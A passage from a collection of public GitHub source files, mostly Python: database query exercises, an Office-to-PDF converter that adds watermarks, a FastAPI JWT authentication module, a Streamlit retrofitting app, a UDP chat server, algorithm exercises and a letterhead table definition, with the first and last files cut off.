self.img_width)\n self.height = int(data[5] * self.img_height)\n\n self.half_height = (self.height // 2) - 1\n self.half_width = (self.width // 2) - 1\n\n self.y_min = self.y_cent - self.half_height\n self.x_min = self.x_cent - self.half_width\n self.y_max = self.y_cent + self.half_height\n self.x_max = self.x_cent + self.half_width\n except Exception as e:\n print(e)\n print(data)\n\n def updateCenter(self, X_cent):\n self.x_cent = X_cent[0]\n self.y_cent = X_cent[1]\n self.y_min = self.y_cent - self.half_height\n self.x_min = self.x_cent - self.half_width\n self.y_max = self.y_cent + self.half_height\n self.x_max = self.x_cent + self.half_width\n\n def getCenter(self, homogenous=True):\n if homogenous:\n return np.array([self.x_cent, self.y_cent, 1], dtype=np.float64)\n else:\n return np.array([self.x_cent, self.y_cent])\n\n def __str__(self) -> str:\n string = \"xmin: {}, xmax: {}, ymin: {}, ymax: {}\".format(\n self.x_min, self.x_max, self.y_min, self.y_max\n )\n return string\n","repo_name":"AleRiccardi/label-clouds","sub_path":"label/types/bounding_box.py","file_name":"bounding_box.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"1105739255","text":"#!/usr/bin/python3\n\n\"\"\"\n this is a script that prints all City objects\n from the database hbtn_0e_14_usa\n\"\"\"\n\n\nfrom sys import argv\nfrom model_state import Base, State\nfrom model_city import City\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy import create_engine\n\n\nif __name__ == '__main__':\n engine = create_engine('mysql+mysqldb://{}:{}@localhost:3306/{}'.format(\n argv[1], argv[2], argv[3]),\n pool_pre_ping=True)\n\n Session = sessionmaker(bind=engine)\n Base.metadata.create_all(engine)\n\n session = Session()\n\n cities = session.query(State, City).filter(State.id == City.state_id)\n\n for citie in cities:\n print(\"{}: ({}) {}\".format(citie.State.name,\n citie.City.id,\n citie.City.name))\n\n session.close()\n","repo_name":"chaher13/holbertonschool-higher_level_programming","sub_path":"python-object_relational_mapping/14-model_city_fetch_by_state.py","file_name":"14-model_city_fetch_by_state.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"679976629","text":"from PyPDF2 import PdfFileReader, PdfFileWriter\nfrom PyPDF2.utils import PdfReadError\nfrom reportlab.pdfgen import canvas\nfrom PIL import Image\nimport zipfile\nimport win32com.client\nfrom tempfile import mktemp\nfrom threading import Thread\n\nclass Mixin(object):\n\n def __init__(self, files):\n \"\"\"\n\n state 状态码:\n 0 未启动\n 1 测试\n 2 转换为pdf\n 3 盖章\n 4 合并\n \"\"\"\n self.files = files\n self.err = None\n self.errcode = 0\n self.prgbar_max = 0\n self.prgbar_val = 0\n self.state = 0\n self.doc = []\n self.xls = []\n self.pdf = []\n self.outfile = None\n\nclass Checker(Mixin):\n\n def check(self):\n \"\"\"检测并提示错误\n err为3 pdf检测错误\n err为2 xls检测错误\n err为1 doc检测错误\n\n 如果合法的话,就按照分类分好\n \"\"\"\n self.state = 1\n self.prgbar_max = len(self.files.keys())\n self.prgbar_val = 0\n for item in self.files.keys():\n self.prgbar_val += 1\n filepath = self.files[item][0]\n if filepath.endswith('.pdf'):\n if not self.isValidPdf(filepath):\n self.errcode = 3\n self.err = '{} 不合法'.format(filepath)\n break\n else:\n self.pdf.append(item)\n elif filepath.endswith('.xls') or filepath.endswith('.xlsx'):\n if not self.isValidXls(filepath):\n self.errcode = 2\n self.err = '{} 不合法'.format(filepath)\n break\n else:\n self.xls.append(item)\n elif filepath.endswith('.dox') or filepath.endswith('.docx'):\n if not self.isValidDoc(filepath):\n self.errcode = 1\n self.err = '{} 不合法'.format(filepath)\n break\n else:\n self.doc.append(item)\n\n def isdir(self, z, name):\n \"\"\"检查是否为一个目录\n \"\"\"\n return any(x.startswith(\"%s/\" % name.rstrip(\"/\")) for x in z.namelist())\n\n def isValidDoc(self, filename):\n \"\"\"检查word文件是否合法\n \"\"\"\n try:\n with zipfile.ZipFile(filename, 'r') as f:\n state = self.isdir(f, \"word\") and self.isdir(f, \"docProps\") and self.isdir(f, \"_rels\")\n\n return state\n except zipfile.BadZipfile:\n return False\n\n def isValidXls(self, filename):\n \"\"\"检查excel文件是否合法\n \"\"\"\n try:\n with zipfile.ZipFile(filename, 'r') as f:\n state = self.isdir(f, \"xl\") and self.isdir(f, \"docProps\") and self.isdir(f, \"_rels\")\n\n return state\n except zipfile.BadZipfile:\n return False\n\n def isValidPdf(self, filename):\n \"\"\"检查pdf文件是否合法\n \"\"\"\n with open(filename, 'rb') as f:\n try:\n PdfFileReader(f)\n state = True\n except PdfReadError:\n state = False\n\n return state\n\nclass Converter(Mixin):\n def docToPdf(self, filename):\n \"\"\"word转为pdf\n\n 先尝试使用office word来做转换,\n 再使用wps来做转换。\n\n office软件转换文档为pdf时,会自动加上pdf结尾,\n 所以返回的临时文件要加上pdf的后缀。\n \"\"\"\n tempfile = mktemp()\n wdFormatPDF = 17\n use_wps = False\n state = False\n try:\n word = win32com.client.Dispatch('Word.Application')\n doc = word.Documents.Open(filename)\n doc.SaveAs(tempfile, FileFormat=wdFormatPDF)\n doc.Close()\n state = True\n except Exception as e:\n self.err = str(e)\n use_wps = True\n finally:\n try:\n word.Quit()\n except Exception as e:\n self.err = str(e)\n\n # wps转换\n if use_wps:\n try:\n wps = win32com.client.Dispatch(\"KWPS.Application\")\n doc = wps.Documents.Open(filename)\n doc.SaveAs(tempfile, wdFormatPDF)\n doc.Close()\n state = True\n except Exception as e:\n self.err = str(e)\n self.errcode = 10\n finally:\n try:\n wps.Quit()\n except Exception:\n self.errcode = 110\n\n if state:\n return \"{}.pdf\".format(tempfile)\n else:\n return False\n\n def xlsToPdf(self, filename):\n \"\"\"execl转为pdf\n\n 先使用excel来做转换,再使用et来做转换\n \"\"\"\n tempfile = mktemp()\n xlFormatPDF = 57\n use_et = False # 是否使用et\n state = False # 转换状态\n # excel = comtypes.client.CreateObject('Excel.Application')\n try:\n excel = win32com.client.Dispatch('Excel.Application')\n wb = excel.Workbooks.Open(filename)\n wb.SaveAs(tempfile, FileFormat=xlFormatPDF)\n wb.Close()\n state = True\n except Exception as e:\n self.err = str(e)\n use_et = True\n finally:\n try:\n excel.Quit()\n except Exception as e:\n self.err = str(e)\n # et转换\n if use_et:\n try:\n et = win32com.client.Dispatch('KET.Application.9')\n workbook = et.Workbooks.Open(filename)\n workbook.ExportAsFixedFormat(0, tempfile)\n workbook.Close()\n state = True\n except Exception as e:\n self.err = str(e)\n self.errcode = 11\n finally:\n try:\n et.Quit()\n except Exception:\n self.errcode = 111\n\n if state:\n return \"{}.pdf\".format(tempfile)\n else:\n return False\n\n def convert(self):\n \"\"\"转换为pdf\n \"\"\"\n self.state = 2\n self.prgbar_max = len(self.doc) + len(self.xls)\n self.prgbar_val = 0\n for item in self.doc:\n self.prgbar_val += 1\n filepath = self.files[item][0]\n trans = self.docToPdf(filepath)\n if trans is not None:\n self.files[item][0] = trans\n else:\n return 2\n for item in self.xls:\n self.prgbar_val += 1\n filepath = self.files[item][0]\n trans = self.xlsToPdf(filepath)\n if trans is not None:\n self.files[item][0] = trans\n else:\n return 2\n\n return 0\n\nclass WaterMark(Mixin):\n\n def mark(self, filename):\n \"\"\"添加水印\n\n pdf添加水印只能通过新建一个pdf,在新建的\n 文件中添加图片,然后保存。\n 将新建的文件与水印文件,合并。一页一页地\n 合并,完成后生成新文件即可。\n 由于长宽不确定所以,计算了大概印章的位置,\n 利用黄金分割比。\n\n 返回输出文件\n \"\"\"\n tempmark = mktemp() # 水印文件\n tempout = mktemp() # 输出文件\n item = self.files[filename]\n # 获取长宽\n infile = PdfFileReader(open(item[0], 'rb'))\n rate = 0.618\n mdbox = list(infile.getPage(0).mediaBox)\n # 按照黄金分割率放置图片\n width = float(mdbox[2] - mdbox[0])\n height = float(mdbox[3] - mdbox[1])\n # 渲染图片\n img = self.transparent(item[1], width, height)\n # 新建一个新的pdf\n c = canvas.Canvas(tempmark)\n c.drawImage(img, width * rate, height * rate, mask='auto')\n c.save()\n # 打开pdf\n watermark = PdfFileReader(open(tempmark, 'rb'))\n outfile = PdfFileWriter()\n\n pagecount = infile.getNumPages()\n\n # 为每一页添加水印\n for page_num in range(pagecount):\n self.prgbar_val += 1\n inpage = infile.getPage(page_num)\n inpage.mergePage(watermark.getPage(0))\n outfile.addPage(inpage)\n\n # 输出到输出文件\n with open(tempout, 'wb') as outpdf:\n outfile.write(outpdf)\n\n return tempout\n\n def setMark(self):\n self.state = 3\n self.prgbar_max = 0\n self.prgbar_val = 0\n # 计算总页数\n for item in [*self.doc, *self.xls, *self.pdf]:\n if isinstance(self.files[item][1], str):\n src = self.files[item][0]\n pdfreader = PdfFileReader(open(src, 'rb'))\n self.prgbar_max += pdfreader.getNumPages()\n # 操作\n for item in [*self.doc, *self.xls, *self.pdf]:\n if isinstance(self.files[item][1], str):\n self.files[item][0] = self.mark(item)\n\n def transparent(self, image, width, height):\n \"\"\"透明化处理\"\"\"\n handle_file = mktemp() + '.png'\n img = Image.open(image)\n img = img.convert(\"RGBA\")\n # 保持宽高比,将图片变为pdf高度的1/6\n sheight = height / 6.0\n swidth = img.width * sheight / img.height\n img = img.resize((int(swidth), int(sheight)))\n # 全部设为0.75透明\n img.putalpha(192)\n data = img.getdata()\n\n # 处理全部白色为全透明\n new_data = []\n for ele in data:\n if ele[0] == 255 and ele[1] == 255\\\n and ele[2] == 255:\n new_data.append((255, 255, 255, 0))\n elif ele[0] == 0 and ele[1] == 0\\\n and ele[2] == 0:\n new_data.append((255, 255, 255, 0))\n else:\n new_data.append(ele)\n img.putdata(new_data)\n img.save(handle_file, \"PNG\")\n\n return handle_file\n\nclass FullConverter(Checker, Converter, WaterMark):\n\n def concat(self):\n \"\"\"将多个pdf文件合成一个\"\"\"\n self.prgbar_max = 0\n self.prgbar_val = 0\n tempout = mktemp()\n outfile = PdfFileWriter()\n # 计算总页数\n for item in [*self.doc, *self.xls, *self.pdf]:\n src = self.files[item][0]\n pdfreader = PdfFileReader(open(src, 'rb'))\n self.prgbar_max += pdfreader.getNumPages()\n for item in self.files.values():\n infile = PdfFileReader(open(item[0], 'rb'))\n pagecount = infile.getNumPages()\n for page_num in range(pagecount):\n self.prgbar_val += 1\n inpage = infile.getPage(page_num)\n outfile.addPage(inpage)\n\n with open(tempout, 'wb') as pdfout:\n outfile.write(pdfout)\n\n return tempout\n\n def execute(self):\n \"\"\"执行流程与check处理\n \"\"\"\n self.check()\n if self.errcode != 0:\n return 1\n else:\n if self.errcode == 0:\n self.convert()\n if self.errcode == 0:\n self.setMark()\n if self.errcode == 0:\n self.outfile = self.concat()\n\n def run(self):\n \"\"\"子进程方式运行\n \"\"\"\n self.p = Thread(target=self.execute, args=())\n self.p.start()\n","repo_name":"ssfdust/OfficeConventer","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":11488,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"72669661593","text":"from datetime import datetime, timedelta\n\nimport jwt\nfrom decouple import config\nfrom fastapi import HTTPException\nfrom fastapi.security import HTTPBearer\nfrom fastapi.security.utils import get_authorization_scheme_param\nfrom starlette.requests import Request\n\nfrom domain.models import User\nfrom logger import logger\nfrom schemas.enums import Roles\nfrom schemas.user import UserRegisterIn\nfrom service_layer.unit_of_work import SqlalchemyUnitOfWork\n\n\nclass AuthManager:\n @staticmethod\n def encode_token(user: User):\n try:\n payload = {\n \"email\": user.email,\n \"exp\": datetime.utcnow() + timedelta(minutes=120),\n }\n return jwt.encode(payload, config(\"SECRET_KEY\"), algorithm=\"HS256\")\n except Exception as ex:\n logger.error(f\"Error while encoding token: {ex}\")\n raise ex\n\n @staticmethod\n def get_user_from_token(credentials, request, uow):\n \"\"\"\n Get user from token\n Args:\n credentials:\n request:\n uow:\n\n Returns:\n\n \"\"\"\n try:\n payload = jwt.decode(\n credentials, config(\"SECRET_KEY\"), algorithms=[\"HS256\"]\n )\n user_data = uow.repository.get(\n User, dict_to_filter={\"email\": payload[\"email\"]}\n )\n request.state.user = user_data\n return user_data\n except jwt.ExpiredSignatureError:\n raise HTTPException(401, \"Token is expired\")\n except jwt.InvalidTokenError:\n raise HTTPException(401, \"Invalid token\")\n\n\nclass CustomHHTPBearer(HTTPBearer):\n \"\"\"\n Custom HTTP Bearer class to handle user authentication\n \"\"\"\n\n async def __call__(self, request: Request):\n authorization = request.headers.get(\"Authorization\")\n _, credentials = get_authorization_scheme_param(authorization)\n uow = SqlalchemyUnitOfWork()\n if credentials:\n with uow:\n user_data = AuthManager.get_user_from_token(credentials, request, uow)\n\n request.state.user = UserRegisterIn.from_orm(user_data)\n else:\n request.state.user = User(role=Roles.anonymous, email=\"\")\n\n\noauth2_scheme = CustomHHTPBearer()\n\n\ndef is_admin(request: Request):\n if not request.state.user.role == Roles.admin:\n raise HTTPException(403, \"Forbidden\")\n\n\ndef is_super_admin(request: Request):\n if not request.state.user.role == Roles.super_admin:\n raise HTTPException(403, \"Forbidden\")\n\n\ndef is_admin_or_super_admin(request: Request):\n if not request.state.user.role in [Roles.admin, Roles.super_admin]:\n raise HTTPException(403, \"Forbidden\")\n","repo_name":"jval7/catalog-challenge","sub_path":"service_layer/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"13817622083","text":"'''\nGiven an array of strictly the characters 'R', 'G', and 'B', segregate\nthe values of the array so that all the Rs come first, the Gs come\nsecond, and the Bs come last. You can only swap elements of the array.\n\nDo this in linear time and in-place.\n'''\n\ndef swap_array(array, i, j):\n array[i], array[j] = array[j], array[i]\n\n\ndef arrange_array(array):\n g0 = -1\n g1 = -1\n b0 = -1\n\n for i, e in enumerate(array):\n if e == 'B':\n if b0 < 0:\n b0 = i\n\n if e == 'G':\n if g0 >= 0: \n if b0 >= 0:\n swap_array(array, b0, i)\n\n g1 = b0\n b0 = b0 + 1\n else:\n g1 = g1 + 1\n else:\n if b0 >= 0:\n swap_array(array, b0, i)\n\n g0 = b0\n g1 = b0\n b0 = b0 + 1\n else:\n g0 = i\n g1 = i\n\n if e == 'R':\n if b0 >= 0:\n if g0 >= 0:\n swap_array(array, b0, i)\n swap_array(array, g0, b0)\n\n g0 = g0 + 1\n g1 = g1 + 1\n b0 = b0 + 1\n else:\n swap_array(array, b0, i)\n\n b0 = b0 + 1\n else:\n if g0 >= 0:\n swap_array(array, g0, i)\n\n g0 = g0 + 1\n g1 = i\n\n return array\n\ndef arrange_array_2(array):\n idx_low = 0\n idx_mid = 0\n idx_high = len(array) - 1\n\n while idx_mid < idx_high:\n if array[idx_mid] == 'B':\n swap_array(array, idx_mid, idx_high)\n idx_high -= 1\n\n if array[idx_mid] == 'R':\n swap_array(array, idx_mid, idx_low)\n idx_low += 1\n idx_mid += 1\n\n if array[idx_mid] == 'G':\n idx_mid += 1\n\n return(array)\n\n\narray_test = ['G', 'B', 'R', 'R', 'B', 'R', 'G']\n\nprint(f'Sorting array {array_test} with method 1:')\narray_sorted = arrange_array(array_test.copy())\nprint(array_sorted)\n\nprint(f'Sorting array {array_test} with method 2:')\narray_sorted_2 = arrange_array_2(array_test.copy())\nprint(array_sorted_2)\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"bcadenato/dailycodingproblem","sub_path":"problems/problem_35.py","file_name":"problem_35.py","file_ext":"py","file_size_in_byte":2272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"32498098246","text":"from configparser import ConfigParser\nfrom pathlib import Path\nfrom typing import Any\nfrom typing import Dict\n\nimport streamlit as st\n\nfrom dea import CONFIG\nfrom dea import DEFAULTS\nfrom dea import _DATA_DIR\nfrom dea import filter\nfrom dea import io\nfrom dea import plot\nfrom dea.mapselect import mapselect\nfrom dea import retrofit\n\nDeaSelection = Dict[str, Any]\n\n\ndef main(\n defaults: DeaSelection = DEFAULTS,\n data_dir: Path = _DATA_DIR,\n config: ConfigParser = CONFIG,\n):\n st.header(\"Welcome to the Dublin Retrofitting Tool\")\n\n small_area_boundaries = io.load_small_area_boundaries(\n url=config[\"urls\"][\"small_area_boundaries\"], data_dir=data_dir\n )\n\n with st.form(key=\"Inputs\"):\n st.markdown(\"ℹ️ Click `Submit` once you've selected all parameters\")\n selected_energy_ratings = st.multiselect(\n \"Select BER Ratings\",\n options=[\"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\"],\n default=[\"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\"],\n )\n selected_small_areas = mapselect(\n column_name=\"small_area\", boundaries=small_area_boundaries\n )\n retrofit_selections = _retrofitselect(defaults)\n inputs_are_submitted = st.form_submit_button(label=\"Submit\")\n\n if inputs_are_submitted:\n pre_retrofit = io.load_selected_buildings(\n url=config[\"urls\"][\"bers\"],\n data_dir=data_dir,\n selected_energy_ratings=selected_energy_ratings,\n selected_small_areas=selected_small_areas,\n )\n\n with st.spinner(\"Retrofitting buildings...\"):\n post_retrofit = retrofit.retrofit_buildings(\n buildings=pre_retrofit, selections=retrofit_selections\n )\n\n pre_vs_post_bers = retrofit.calculate_ber_improvement(\n pre_retrofit=pre_retrofit, post_retrofit=post_retrofit\n )\n pre_vs_post_hps = retrofit.calculate_heat_pump_viability_improvement(\n pre_retrofit=pre_retrofit, post_retrofit=post_retrofit\n )\n\n plot.plot_ber_rating_comparison(pre_vs_post_bers)\n plot.plot_heat_pump_viability_comparison(pre_vs_post_hps)\n plot.plot_retrofit_costs(post_retrofit=post_retrofit)\n\n\ndef _retrofitselect(defaults: DeaSelection) -> DeaSelection:\n selections = defaults.copy()\n for component, properties in defaults.items():\n with st.expander(label=f\"Change {component} defaults\"):\n selections[component][\"uvalue\"][\"target\"] = st.number_input(\n label=\"Threshold U-Value [W/m²K] - assume no retrofits below this value\",\n min_value=float(0),\n value=properties[\"uvalue\"][\"target\"],\n key=component + \"_threshold\",\n step=0.05,\n )\n c1, c2 = st.beta_columns(2)\n selections[component][\"cost\"][\"lower\"] = c1.number_input(\n label=\"Lowest* Likely Cost [€/m²]\",\n min_value=0,\n value=properties[\"cost\"][\"lower\"],\n key=component + \"_cost_lower\",\n step=5,\n )\n selections[component][\"cost\"][\"upper\"] = c2.number_input(\n label=\"Highest** Likely Cost [€/m²]\",\n min_value=0,\n value=properties[\"cost\"][\"upper\"],\n key=component + \"_cost_upper\",\n step=5,\n )\n footnote = f\"\"\"\n * {properties[\"typical_area\"] * properties[\"cost\"][\"lower\"]}€\n for a typical {component} area of {properties[\"typical_area\"]}m²
    \n ** {properties[\"typical_area\"] * properties[\"cost\"][\"upper\"]}€\n for a typical {component} area of {properties[\"typical_area\"]}m²
    \n \"\"\"\n st.markdown(footnote, unsafe_allow_html=True)\n\n selections[component][\"percentage_selected\"] = st.slider(\n f\"\"\"% of viable {component}s retrofitted to U-Value =\n {selections[component]['uvalue']['target']} [W/m²K]\"\"\",\n min_value=0.0,\n max_value=1.0,\n value=0.0,\n key=component + \"_percentage\",\n )\n\n return selections\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"codema-dev/dublin-energy-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"42076478178","text":"from generic_lotto import LottoBlower\n\nmachine = LottoBlower[int]([1, .2])\n## error: List item 1 has incompatible type \"float\"; # <1>\n## expected \"int\"\n\nmachine = LottoBlower[int](range(1, 11))\n\nmachine.load('ABC')\n## error: Argument 1 to \"load\" of \"LottoBlower\" # <2>\n## has incompatible type \"str\";\n## expected \"Iterable[int]\"\n## note: Following member(s) of \"str\" have conflicts:\n## note: Expected:\n## note: def __iter__(self) -> Iterator[int]\n## note: Got:\n## note: def __iter__(self) -> Iterator[str]\n\n","repo_name":"fluentpython/example-code-2e","sub_path":"15-more-types/lotto/generic_lotto_errors.py","file_name":"generic_lotto_errors.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":2375,"dataset":"github-code","pt":"5"} +{"seq_id":"36633034526","text":"from db.model import Article, User\nfrom db.session import Session\n\n\ndef main():\n session = Session()\n article_1 = session.query(Article).filter(Article.id == 1).one()\n print(article_1.author)\n\n article_2 = session.query(Article).filter(Article.id == 3).one()\n print(article_2.author)\n\n user = session.query(User).filter_by(id=201).one()\n print(user.articles)\n\n user.articles.append(\n Article(title=\"Cute panda #2\", content=\"...\")\n )\n session.commit()\n\n print(user.articles)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"SDA-workshops/sdaportal","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"12576361933","text":"#while loop\n#initilization\n#condition\n#incrementation\n\n#print 1..........10 numbers\ni=1 # initilization #---->where we have to start\n\nwhile i<=10: #----> condition where we have to stop\n print(i)\n i=i+1 #how much value we have increment every time\nprint(\"Done!!!\")\n\ni=10\n\nwhile i>=1:\n print(i)\n i=i-1\nprint(\"Done!!!\") ","repo_name":"NesibeOzer-32/pycharmProjects","sub_path":"Pythontraining/day3/WhileLoopDemo.py","file_name":"WhileLoopDemo.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25495173015","text":"import matchAddresses as mAdd\n\n# Create matchAddresses class\nclnAdd = mAdd.matchAddresses(\n\t# Directory of first dataset\n\tinDir1 = '~/InputDirectory1', \n\t# File name of first dataset\n\tinDSN1 = 'Dataset1.csv', \n\t# Extra variables to keep from first dataset\n\tkeepVars1 = ['categories','is_closed','price','rating','review_count'],\n\t# Address variable names in first dataset (as they are)\n\taddressVarsList1 = ['address1','address2','city','zip_code','name'], \n\t# Types of address variables in the first dataset \n\t# (can be 'address1','address2','address','streetNumber','streetName','streetType','unitName','unitType','city','zip','name')\n\taddressVarsTypeList1 = ['address1','address2','city','zip','name'],\n\t# Directory of second dataset\n\tinDir2 = '~/InputDirectory2', \n\t# File name of second dataset\n\tinDSN2 = 'Dataset2.csv', \n\t# Extra variables to keep from second dataset\n\tkeepVars2 = ['ACCT_ID'],\n\t# Address variable names in second dataset (as they are)\n\taddressVarsList2 = ['CITY','ADDRESS','POSTAL','CUST_NAME'], \n\t# Types of address variables in the second dataset \n\t# (can be 'address1','address2','address','streetNumber','streetName','streetType','unitName','unitType','city','zip','name')\n\taddressVarsTypeList2 = ['city','address','zip','name']\t\n)\n\n# Execute the matchAddresses method on the matchAddresses class (only outputs observations where \"match\" = 1)\n# NOTE: this does NOT guarantee a unique match, it is possible for multiple pairs to match each other\nclnAdd.matchAddresses(\n\t# Which dataset is being \"kept\" can be either '1','2', or 'both', this will determine how matches are searched for\n\tkeep = '2',\n\t# Variables that MUST be equal to consider the pair a match (from addressVarsTypeLists defined above)\n\thardByVars = ['zip','streetName','streetNumber'],\n\t# Variables that will also be checked for a match \n\t# (if they aren't equal, then they will be output, but a \"check\" variable will be set to 1 to flag them)\n\tsoftByVars = ['unitNumber','name'],\n\t# Relevant to businesses, if the hardByVars don't match, should the business name be used to check a match?\n\t# NOTE: will perform jaro similarity between two strings on EACH word in the business name and set match = 1 if any of the words\n\t# are above the threshold\n\tcheckName = True,\n\t# Minimum word on word Jaro similarity to be considered a match (default is 1)\n\tjaro_th = 0.9,\n\t# Should a csv be output? Default True\n\toutput_csv = True, \n\t# If outputing a csv, output directory, default is input directory\n\toutDir = '~/OutputDirectory',\n\t# If outputing a csv, output filename, default is \"matchedAddresses\"\n\toutDSN = 'outputDataset.csv'\n)\n","repo_name":"Stanford-Urban-Water-Policy-Innovation/matchAddresses","sub_path":"exampleCaller.py","file_name":"exampleCaller.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38020902369","text":"import socket\nimport time\n\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nhost = ''\nport = 9999\ns.bind((host, port))\n\nclients = []\nquitting = False\nprint('Server started. Socket bind to port %s' % (port))\n\nwhile not quitting:\n try:\n data, addr = s.recvfrom(1024)\n if 'Quit' in data.decode():\n quitting = True\n if addr not in clients:\n clients.append(addr)\n for client in clients:\n if client != addr:\n s.sendto(data, client)\n print(time.ctime(time.time()) + addr.decode() + '::' + data.decode())\n except:\n pass\ns.close()","repo_name":"ThucLPT/lab","sub_path":"NetCentric/Lab7/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25719045578","text":"# insert an element in all possible places\ndef ins(x,xs) :\n for i in range(len(xs)) :\n yield xs[:i]+[x]+xs[i:]\n yield xs + [x]\n\n# insert first in each permutation of the rest of a list\ndef perm(xs) :\n if not xs : yield []\n else :\n for ps in perm(xs[1:]) :\n for rs in ins(xs[0],ps) :\n yield rs\n\n\n# alternative, with immutable\n\nimport immutables as im\n\ndef selectFirst(Xs):\n if not Xs:\n return None\n else:\n X, Ys = Xs\n yield (X, Ys)\n for (Z, Zs) in selectFirst(Ys):\n yield (Z, (X, Zs))\n\n\ndef perm1(Xs):\n if not Xs:\n yield None\n else:\n for (X, Ys) in selectFirst(Xs):\n for Zs in perm1(Ys):\n yield (X, Zs)\n\n\ndef permute(Ls):\n Is = im.fromList(Ls)\n for Ps in perm1(Is):\n yield im.toList(Ps)\n\n\n# tests\n\nt1 = list(ins('*',[1,2,3]))\n\ndef t2() :\n for p in perm([1,2,3]) :\n print(p)\n\nt5 = list(selectFirst((0,(1,(2,(3,None))))))\n\nt6 = list(perm1((0,(1,(2,(3,(4,None)))))))\n\nt7 = im.fromList([0,1,2,3,4])\n\nt8 = im.toList(t7)\n\nt5 = list(permute([1,2,3,4]))\n\ndef t6() :\n for P in permute([1,2,3,4]) :\n print(P)\n\nif __name__ == \"__main__\" :\n t2()\n \n\n","repo_name":"ptarau/PyPL","sub_path":"2021/perm.py","file_name":"perm.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"24834073135","text":"from past.builtins import basestring\nfrom builtins import object\nfrom gnr.core.gnrbag import Bag\nfrom gnr.core.gnrhtml import GnrHtmlBuilder\n\nclass Table(object):\n def config_db(self, pkg):\n tbl = pkg.table('htmltemplate', pkey='id', name_long='!!Letterhead',\n name_plural='!!Letterheads', rowcaption='name',noTestForMerge=True)\n self.sysFields(tbl)\n tbl.column('name', name_long='!!Name',validate_notnull=True)\n tbl.column('username', name_long='!!Username')\n tbl.column('version', name_long='!!Version')\n tbl.column('type_code',size=':15',name_long='Type').relation('letterhead_type.code',relation_name='letterheads',mode='foreignkey',onDelete='raise')\n tbl.column('data', dtype='X', name_long='!!Data', _sendback=True)\n tbl.column('center_height',dtype='I',name_long='!!Center height')\n tbl.column('center_width',dtype='I',name_long='!!Center width')\n\n tbl.column('based_on',size='22' ,group='_',name_long='!!Based on').relation('htmltemplate.id',relation_name='children',one_one=True,mode='foreignkey',onDelete='raise',deferred=True)\n tbl.column('next_letterhead_id',size='22' ,group='_',name_long='!!Next letterhead').relation('htmltemplate.id',relation_name='previous',one_one=True,mode='foreignkey',onDelete='raise',deferred=True)\n\n\n def getTemplate(self,letterhead_id=None,name=None):\n if not(name or letterhead_id):\n return Bag()\n result = Bag()\n if letterhead_id:\n pkeys = self.letterheadChain(letterhead_id)\n f = self.query(where='$id IN :pkeys', pkeys=pkeys, columns='*,$data').fetchAsDict('id')\n if not f:\n return result\n for i,pkey in enumerate(pkeys):\n result.setItem('layer_%i' %i,Bag(f[pkey]['data']))\n if f[letterhead_id]['next_letterhead_id']:\n result['next_letterhead'] = self.getTemplate(f[letterhead_id]['next_letterhead_id'])\n return result\n else:\n templatelist = name.split(',')\n f = self.query(where='$name IN :names', names=templatelist, columns='name,version,data').fetchAsDict(key='name')\n if not f:\n return result\n for i,name in enumerate(templatelist):\n result.setItem('layer_%i' %i,Bag(f[name]['data']))\n return result \n\n def letterheadChain(self,letterhead_id):\n result = [letterhead_id]\n based_on = True\n while based_on:\n based_on = self.readColumns(pkey=result[0],columns='$based_on')\n if based_on:\n result = [based_on]+result\n return result\n\n def getHtmlBuilder(self,letterhead_pkeys=None):\n \"\"\"Prepare the layout template\n \n :param tpl: the template\"\"\"\n \n letterhead_pkeys = letterhead_pkeys.split(',') if isinstance(letterhead_pkeys,basestring) else letterhead_pkeys\n first_letterhead = letterhead_pkeys[0]\n f = self.query(where='$id IN :pk',pk=letterhead_pkeys,bagFields=True).fetchAsDict('id')\n first_letterhead_record = f[first_letterhead]\n if len(letterhead_pkeys) == 1 and first_letterhead_record['based_on']:\n return self.getHtmlBuilder(self.letterheadChain(first_letterhead))\n base_letterhead_bag = Bag()\n base_letterhead_bag.setItem('layer_0',Bag(first_letterhead_record['data']))\n builder = GnrHtmlBuilder(htmlTemplate=base_letterhead_bag)\n builder.initializeSrc()\n height=builder.page_height - builder.page_margin_top - builder.page_margin_bottom\n width=builder.page_width - builder.page_margin_left - builder.page_margin_right\n #page = builder.body.div(height='%imm' %builder.page_height,width='%imm' %builder.page_width,\n # position='relative',_class='letterhead_page')\n\n page = builder.body.div(style=\"\"\"position:relative;\n width:%smm;\n height:%smm;\n top:0mm;\n left:0mm;\n \"\"\" % (builder.page_width, builder.page_height),\n _class='letterhead_page')\n\n\n 